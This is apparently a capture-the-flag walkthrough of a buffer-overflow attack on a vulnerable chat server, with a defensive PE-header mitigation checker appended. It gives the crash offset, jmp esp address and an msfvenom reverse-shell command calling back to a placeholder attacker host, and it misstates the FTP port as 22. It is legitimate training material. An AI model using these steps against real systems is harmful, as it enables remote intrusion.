Brainstorm

Tasks:

  1. Deploy Machine and Scan Network:
    1. Scan with nmap as usual: nmap -sC -sV -T5 ip
  2. Accessing Files:
    1. From the nmap scan, the FTP port is open at 22. Connect using ftp ip with anonymous:anonymous as credentials, then cd chatserver, cd bin, mget * and quit. This downloads chatserver.exe and essfunc.dll.
    2. nc ip 9999 - some chat server is running; it is probably the chatserver.exe we just downloaded through FTP.
  3. Access:
    1. Transfer both the exe and the dll to a Windows machine.
    2. Executing the exe, it takes 2 inputs (username and message). The username is limited to 20 characters, so we can safely assume the message is where the buffer overflow might be.
    3. Start debugging chatserver with Immunity Debugger.
    4. Each time you run a python script, you will need to restart the program in Immunity Debugger.
    5. Use fuzz.py to determine the length of the buffer at which the program crashes ~ 2100.
    6. Generate a cyclic string using an online tool or the Metasploit framework pattern_create.rb, and use the cyclic string as the buffer in offset_finder.py. Run offset_finder.py after restarting chatserver in Immunity Debugger; when the program crashes, note down the value of the EIP register and enter that value in the online tool or pattern_offset.rb. The result is the exact offset at which the buffer was overflowed - 2012.
    7. Run bad_char.py; again, when the program crashes, look for missing bad characters by following the ESP stack dump. If any of them are missing or out of order, remove them from bad_char.py and repeat until all the characters appear in the same order as sent. In this case the only bad character was \x00 - the null character.
    8. Run !mona modules in Immunity Debugger to find the dll and exe running without additional security protections such as ASLR and DEP - chatserver.exe and essfunc.dll.
    9. Run !mona find -s "\xff\xe4" -m essfunc.dll to find the address of a jmp esp instruction inside essfunc.dll. There will be multiple such addresses and you can pick any of them (make sure there are no bad chars in this address) - 625014DF.
    10. Convert the address obtained to little-endian format - "\xdf\x14\x50\x62" - and use this as the value of eip when we later run exploit.py.
    11. Generate the msfvenom payload - msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKERIP LPORT=4444 -b '\x00' -f py - then copy the payload and replace the one in exploit.py.
    12. Start a netcat listener - nc -nlvp 4444
    13. Run python exploit.py to get a shell in netcat.
    14. cd C:\Users\drake\Desktop and type root.txt to get the flag and submit !!!
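Step 8 works because !mona modules reports that chatserver.exe and essfunc.dll were built without ASLR and DEP. The same check can be done on any shipped binary by reading the PE headers directly, which is how a defender audits a build before it reaches a host. The script below is an added example, not part of the writeup or the room; it parses the flags mona displays (DYNAMIC_BASE, NX_COMPAT, GUARD_CF, and RELOCS_STRIPPED, which defeats ASLR even when DYNAMIC_BASE is set) and runs against a constructed minimal PE32 header rather than the real essfunc.dll.

```python
import struct

# IMAGE_OPTIONAL_HEADER.DllCharacteristics flags (PE/COFF spec values).
DYNAMIC_BASE = 0x0040   # module opts in to ASLR
NX_COMPAT = 0x0100      # module opts in to DEP
GUARD_CF = 0x4000       # Control Flow Guard
# IMAGE_FILE_HEADER.Characteristics: relocations stripped -> loader cannot rebase.
RELOCS_STRIPPED = 0x0001


def pe_mitigations(data: bytes) -> dict:
    """Parse the COFF and optional headers of a PE image and report which
    exploit mitigations it opts into (the columns !mona modules prints)."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = pe_off + 4
    (_machine, _nsec, _ts, _symtab, _nsyms,
     opt_size, file_chars) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B) or opt_size < 72:           # PE32 / PE32+
        raise ValueError("unsupported optional header")
    # DllCharacteristics sits at offset 70 of the optional header in both formats.
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    return {
        # ASLR is only effective if the image can actually be relocated.
        "aslr": bool(dll_chars & DYNAMIC_BASE) and not (file_chars & RELOCS_STRIPPED),
        "dep": bool(dll_chars & NX_COMPAT),
        "cfg": bool(dll_chars & GUARD_CF),
    }


def build_minimal_pe(dll_chars: int, file_chars: int = 0) -> bytes:
    """Constructed, headers-only PE32 image used as offline sample input."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 96, file_chars)  # i386
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    return dos + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Constructed stand-in for a module like essfunc.dll (no flags set).
    unprotected = build_minimal_pe(0)
    hardened = build_minimal_pe(DYNAMIC_BASE | NX_COMPAT | GUARD_CF)
    print("unprotected:", pe_mitigations(unprotected))
    print("hardened:   ", pe_mitigations(hardened))
```

A module reporting aslr False and dep False is exactly the kind mona flags as usable for a static jmp esp, so failing a build on that result is the cheap fix.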
